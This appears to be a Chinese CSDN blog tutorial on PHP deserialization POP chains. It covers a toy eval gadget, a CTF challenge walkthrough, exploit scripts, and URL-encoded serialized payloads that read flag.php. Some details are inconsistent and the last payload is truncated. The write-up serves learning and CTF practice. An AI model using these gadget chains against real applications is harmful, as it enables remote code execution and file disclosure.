php反序列化总结(二)

最新推荐文章于 2020-11-22 17:04:15 发布
最新推荐文章于 2020-11-22 17:04:15 发布
阅读量501 收藏 3
点赞数
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_43801002/article/details/106183081
版权

反序列化与POP CHAIN

POP CHAIN:把魔术方法作为最开始的小组件,然后在魔术方法中调用其他函数(小组件),通过寻找相同名字的函数,再与类中的敏感函数和属性相关联,就是POP CHAIN 。

在反序列化中,我们所能控制的数据就是对象中的各个属性值,所以在PHP的反序列化有一种漏洞利用方法叫做“面向属性编程”,即POP(Property Oriented Programming)

通俗点就是:反序列化中,如果关键代码不在魔术方法中,而是在一个类的普通方法中。这时候可以通过寻找相同的函数名将类的属性和敏感函数的属性联系起来。
举一个小例子

<?php
class hgyx
{
    protected $ClassObj;
    function __construct() {
        $this->ClassObj = new safe();
    }
    function __destruct() {
        $this->ClassObj->action();
    }
}

class safe
{
    function action() {
        echo "Here is safe";
    }
}

class unsafe
{
    private $data;
    function action() {
        eval($this->data);
    }
}

unserialize($_GET['test']);

构造POP链。
protected $ClassObj = new evil();是不行的,还是要通过__construct来实例化。
受保护成员变量含有\0*需要URL编码一下。

<?php 
class hgyx
{
    protected $ClassObj;
    function __construct()
    {
        $this->ClassObj = new unsafe();
    }
}

class unsafe
{
    private $data="phpinfo();";
}
echo serialize(new hgyx());
?>

payload:

test=O%3A5%3A%22Smi1e%22%3A1%3A%7Bs%3A11%3A%22%00%2A%00ClassObj%22%3BO%3A6%3A%22unsafe%22%3A1%3A%7Bs%3A12%3A%22%00unsafe%00data%22%3Bs%3A10%3A%22phpinfo%28%29%3B%22%3B%7D%7D

phpggc:收集了一些常见的PHP框架的通用反序列化的小工具链
https://github.com/ambionics/phpggc

二、题目

<?php  
@error_reporting(1); 
include 'flag.php';
class baby 
{   
    protected $skyobj;  
    public $aaa;
    public $bbb;
    function __construct() 
    {      
        $this->skyobj = new sec;
    }  
    function __toString()      
    {          
        if (isset($this->skyobj))  
            return $this->skyobj->read();      
    }  
}  

class cool 
{    
    public $filename;     
    public $nice;
    public $amzing; 
    function read()      
    {   
        $this->nice = unserialize($this->amzing);
        $this->nice->aaa = $sth;
        if($this->nice->aaa === $this->nice->bbb)
        {
            $file = "./{$this->filename}";        
            if (file_get_contents($file))         
            {              
                return file_get_contents($file); 
            }  
            else 
            { 
                return "you must be joking!"; 
            }    
        }
    }  
}  
  
class sec 
{  
    function read()     
    {          
        return "it's so sec~~";      
    }  
}  

if (isset($_GET['data']))  
{ 
    $Input_data = unserialize($_GET['data']);
    echo $Input_data; 
} 
else 
{ 
    highlight_file("./index.php"); 
} 
?>

分析:
baby类

class baby 
{   
    protected $skyobj;  
    public $aaa;
    public $bbb;
    function __construct() 
    {      
        $this->skyobj = new sec;
    }  
    function __toString()      
    {          
        if (isset($this->skyobj))  
            return $this->skyobj->read();      
    }  
}

两个值,__construct()方法调用sec类中的方法。当通过baby类new一个skyobj对象进行反序列化时,触发__construct(),$this->skyobj= new sec;这一句则触发__toString() ,从而得出的结果是 “it’s so sec~~”;

cool类

class cool 
{    
    public $filename;     
    public $nice;
    public $amzing; 
    function read()      
    {   
        $this->nice = unserialize($this->amzing);
        $this->nice->aaa = $sth;
        if($this->nice->aaa === $this->nice->bbb)
        {
            $file = "./{$this->filename}";        
            if (file_get_contents($file))         
            {              
                return file_get_contents($file); 
            }  
            else 
            { 
                return "you must be joking!"; 
            }    
        }
    }  
}

·有file_get_contents函数,只要满足if($this->nice->aaa === $this->nice->bbb)就可以继续往下面执行,但发现了一个未知变量 $sth$this->nice->aaa = $sth;这样的话aaa的值就不能确定了。
·关键代码在cool类的read方法中,但baby类中调用的却是sec类的read方法,所以这个时候就要用到POP链构造
第一个EXP:
要先触发__construct()方法,就必须有一个baby类的对象,并且是序列化后的

<?php
class baby 
{   
    protected $skyobj;  
    public $aaa;
    public $bbb;
    function __construct() 
    {      
        $this->skyobj = new cool;
    }  
    function __toString()      
    {          
        if (isset($this->skyobj))  
            return $this->skyobj->read();      
    }  
}  

class cool 
{    
    public $filename='flag.php';     
    public $nice;
    public $amzing='O%3A4%3A%22baby%22%3A3%3A%7Bs%3A9%3A%22%00%2A%00skyobj%22%3BO%3A4%3A%22cool%22%3A3%3A%7Bs%3A8%3A%22filename%22%3BN%3Bs%3A4%3A%22nice%22%3BN%3Bs%3A6%3A%22amzing%22%3BN%3B%7Ds%3A3%3A%22aaa%22%3BN%3Bs%3A3%3A%22bbb%22%3BR%3A6%3B%7D'; 
    function read()      
    {   
        $this->nice = unserialize($this->amzing);
        $this->nice->aaa = $sth;
        if($this->nice->aaa === $this->nice->bbb)
        {
            $file = "./{$this->filename}";        
            if (file_get_contents($file))         
            {              
                return file_get_contents($file); 
            }  
            else 
            { 
                return "you must be joking!"; 
            }    
        }
    }  
}  
class sec 
{  
    function read()     
    {          
        return "it's so sec~~";      
    }  
}  
$a = new baby();
$a->bbb =&$a->aaa; 
$b=serialize($a);
echo urlencode($b);
?>

赋值给$amazing

O%3A4%3A%22baby%22%3A3%3A%7Bs%3A9%3A%22%00%2A%00skyobj%22%3BO%3A4%3A%22cool%22%3A3%3A%7Bs%3A8%3A%22filename%22%3Bs%3A8%3A%22flag.php%22%3Bs%3A4%3A%22nice%22%3BN%3Bs%3A6%3A%22amzing%22%3BN%3B%7Ds%3A3%3A%22aaa%22%3BN%3Bs%3A3%3A%22bbb%22%3BN%3B%7D

最终payload

<?php
class baby 
{   
    protected $skyobj;  
    public $aaa;
    public $bbb;
    function __construct() 
    {      
        $this->skyobj = new cool;//更改为cool类
    }  
    function __toString()      
    {          
        if (isset($this->skyobj))  
            return $this->skyobj->read();      
    }  
}  

class cool 
{    
    public $filename='./flag.php';     
    public $nice;
    public $amzing='O%3A4%3A%22baby%22%3A3%3A%7Bs%3A9%3A%22%00%2A%00skyobj%22%3BO%3A4%3A%22cool%22%3A3%3A%7Bs%3A8%3A%22filename%22%3Bs%3A8%3A%22flag.php%22%3Bs%3A4%3A%22nice%22%3BN%3Bs%3A6%3A%22amzing%22%3BN%3B%7Ds%3A3%3A%22aaa%22%3BN%3Bs%3A3%3A%22bbb%22%3BN%3B%7D
'; 
    function read()      
    {   
        $this->nice = unserialize($this->amzing);
        $this->nice->aaa = $sth;
    }  
}  

$a = new baby();
$a->bbb =&$a->aaa; 
echo urlencode(serialize($a));
浩歌已行
关注
  • 0
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
php反序列化总结
kekefen01的博客
05-25 254
反序列化漏洞黑盒很难发现,即使发现了也好难利用。不过危害很大。 序列化使用函数serialize()来返回一个包含字节流的字符串来表示。unserialize()函数能够重新把字符串变回php原来的值。 序列化一个对象将会保存对象的所有变量,但是不会保存对象的方法,只会保存类的名字。 序列化结果 string(5) "i:34;" //number string(13) "s:6:"uus...
ISCC2020-Web题解
Lemon's blog
05-27 2147
神秘组织的邮件-2 点击提交数字会发生改变,因为这次的赛制有一个关联,通过上一题 得出的flag是加键乘除,又提示要联系起来,就想起了之前做有一道秋名山车神那道题,只不过这个题需要将运算符手动添加,脚本如下: import requests from bs4 import BeautifulSoup import re import time if __name__ == '__main__': time_start=time.time() url = 'http://101.201.126
PHP反序列化练习册
qwsn
11-19 2586
1、XCTF平台:https://adworld.xctf.org.cn/task 高阶:1.unserialize3 高阶:2.Web_php_unserialize 2、BUUCTF平台:https://buuoj.cn/challenges Web类:4.[安洵杯 2019]easy_serialize_php Web类:5.[ZJCTF 2019]NiZhuanSiWei Basic类:6.BUU CODE REVIEW 1 Web类:7.[网鼎杯 2020 青龙组]AreUSerialz Web类
PHP反序列化—构造POP链
Lemon's blog
04-03 4546
前言: 最近在刷题的时候发现这个PHP反序列化—POP链,之前理解的序列化攻击多是在魔术方法中出现一些利用的漏洞,自动调用从而触发漏洞。但如果关键代码不在魔术方法中,而是在一个类的普通方法中。这时候可以通过寻找相同的函数名将类的属性和敏感函数的属性联系起来。 直接通过题目来进行学习,这样更容易掌握!!! Ezpop class Modifier { protected $var; ...
PHP反序列化笔记
大方子
01-16 4052
目录 文章目录目录private变量与protected变量序列化后的特点序列化后的字段长度前面可以加 +题目解题步骤CVE-2016-7124漏洞介绍演示代码题目解题步骤PHP Session 反序列化PHP的3种序列化处理器安全问题当 session.auto_start=Off 时测试Demo题目解题步骤phar反序列化 private变量与protected变量序列化后的特点 \x00 +...
详解PHP序列化和反序列化原理
10-18
本篇文章给大家分享了下PHP反序列化漏洞系列之PHP序列化和反序列化原理的相关知识,有这方面需要的朋友参考学习下吧。
php json与xml序列化/反序列化
10-26
在WEB开发中,php对象的序列化与反序列化经常使用,比较主流的有json格式与xml格式的序列化与反序列化。今天我们就来看看是如何用的。
详解php反序列化
10-15
主要介绍了php反序列化的相关知识,文中讲解非常细致,代码帮助各位更好的理解和学习,感兴趣的朋友可以了解下
php中序列化与反序列化详解
01-20
把复杂的数据类型压缩到一个字符串中 serialize() 把变量和它们的值编码成文本形式 unserialize() 恢复原先变量 eg: $stooges = array('Moe','Larry','Curly'); $new = serialize($stooges); print_r($new);...
2019安恒一月月赛web1-babygo
0nc3的博客
01-28 1815
web1-babygo 考察知识点: PHP反序列化 POP链构造 由于还是个萌新…只会一点反序列化,还是第一次知道POP链构造,哭了 虽然没有写出来,但是想记录下这次学习过程 参考链接:https://www.anquanke.com/post/id/170341 下面为题目源码 &amp;amp;amp;amp;lt;?php @error_reporting(1); include 'flag.php'; cla...
BugkuCTF(Web) WriteUp
CallMeSa1tyFish的博客
08-06 6065
Web部分 web2 点开以后发现是满屏的滑稽,按照国际惯例,查看源代码发现flag 文件上传测试 用burp抓包修改文件名后缀为.php 计算器 修改最大长度限制 web基础$_GET 题目如下 $what=$_GET['what']; echo $what; if($what=='flag') echo 'flag{****}'; 直接输入?what=fla...
安恒月赛writeup 2019年1月
SsMing的博客
01-26 2922
  目录 web1 pwn2 misc1 misc2 reverse1 crypt1 新的一年,各位师傅太强了 web1 访问后看见源码 &lt;?php @error_reporting(1); #include 'flag.php'; class baby { protected $skyobj; public $aaa; pu...
【入门指南】Hello World, I‘m Mo
Mo 的博客
12-18 550
​​我是Mo,一个支持数据分析和AI在线建模的平台网站。刚出生一周,在团队所有小哥哥小姐姐们的努力和期待下,我终于在CSDN公开亮相啦。第一次发言有些紧张,为了表达我的诚意,先附上个人资料做一个自我介绍吧。...
Php_is_the_best_language-[ISCC2020]-[本地复现]
qwsn
11-22 1678
0x01、Web类 1.Php_is_the_best_language-[ISCC2020]-[本地复现] 第一步:代码审计 <?php @error_reporting(1); //运行时遇到致命的错误,停止执行脚本 include 'flag.php'; //提示当前目录下有一个flag.php class baby //类:baby { public $file; //公有属性:$file function __toString(
ctf中的一道反序列化
weixin_40709439的博客
09-27 5245
早就想写了,今天刚好遇到一道反序列化的题就记录一下 自己在本地搭的,源码如下: index1.php &lt;?php error_reporting(E_ALL &amp; ~E_NOTICE); $user = $_GET["user"]; $file = $_GET["file"]; $pass = $_GET["pass"]; if(isset($user)&amp;&amp;...
NCTF 南京邮电大学网络攻防训练平台 WriteUp
热门推荐
4ct10n
08-02 8万+
NCTF 南京邮电大学网络攻防训练平台 WriteUp不说什么直接上题解WEB1.签到题(50)直接查看网页源码 Flag:nctf{flag_admiaanaaaaaaaaaaa}2.md5 collision(50)源码如下:<?php $md51 = md5('QNKCDZO'); $a = @$_GET['a']; $md52 = @md5($a); if(isset($a)){ i
CTF-安恒18年十月月赛部分writeup
weixin_34255055的博客
12-22 662
CTF-安恒十月月赛部分writeup 这次题目都比较简单蛤,连我这菜鸡都能做几道。 WEB1-ezweb2 打开网站,啥也没有,审计源代码,还是啥都没有,也没什么功能菜单,扫了一下目录,扫到了admin.php,但是提示:你不是管理员。好吧,抓个包看看 解一下码--: 将user改为admin,发现直接跳转到了admin.php页面。 这个框试了一下是可以执行命...
bugku平台web部分writeup
test
10-16 4761
前言 很久以前基本就做完了bugku平台上的web题目,最近整理整理一下。 正文 web2 提示:听说聪明的人都能找到答案 链接 flag在源代码中。 计算器 后言 ...
《WEB安全渗透测试》(14)一个文件包含漏洞(需要利用菜刀原理)
午夜安全
10-14 2624
《WEB安全渗透测试》(14)一个文件包含漏洞(需要利用菜刀原理) 这个题目让利用你所学到的知识,测试该网站可能存在的文件包含漏洞,并且尝试获取webshell。直接访问它包含的文件http://192.168.223.134/test/md3oa/vulnerabilities/view.html,查看页面源码。在view.html可以看到这里有一段PHP代码,取出来如下:上面代码明显使用了BASE64编码,解码后如下所示:这是一个非常经典的一句话木马,假设它已经上传:现在使用菜刀去连接,在菜刀配置好代理
PHP序列化和反序列化
最新发布
09-14
总结一下,PHP序列化和反序列化是将PHP对象转换为可存储或传输的格式以及将已序列化的数据重新恢复为PHP对象的过程,通过serialize()函数和unserialize()函数实现。它们在PHP中广泛应用于对象的存储和传输。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值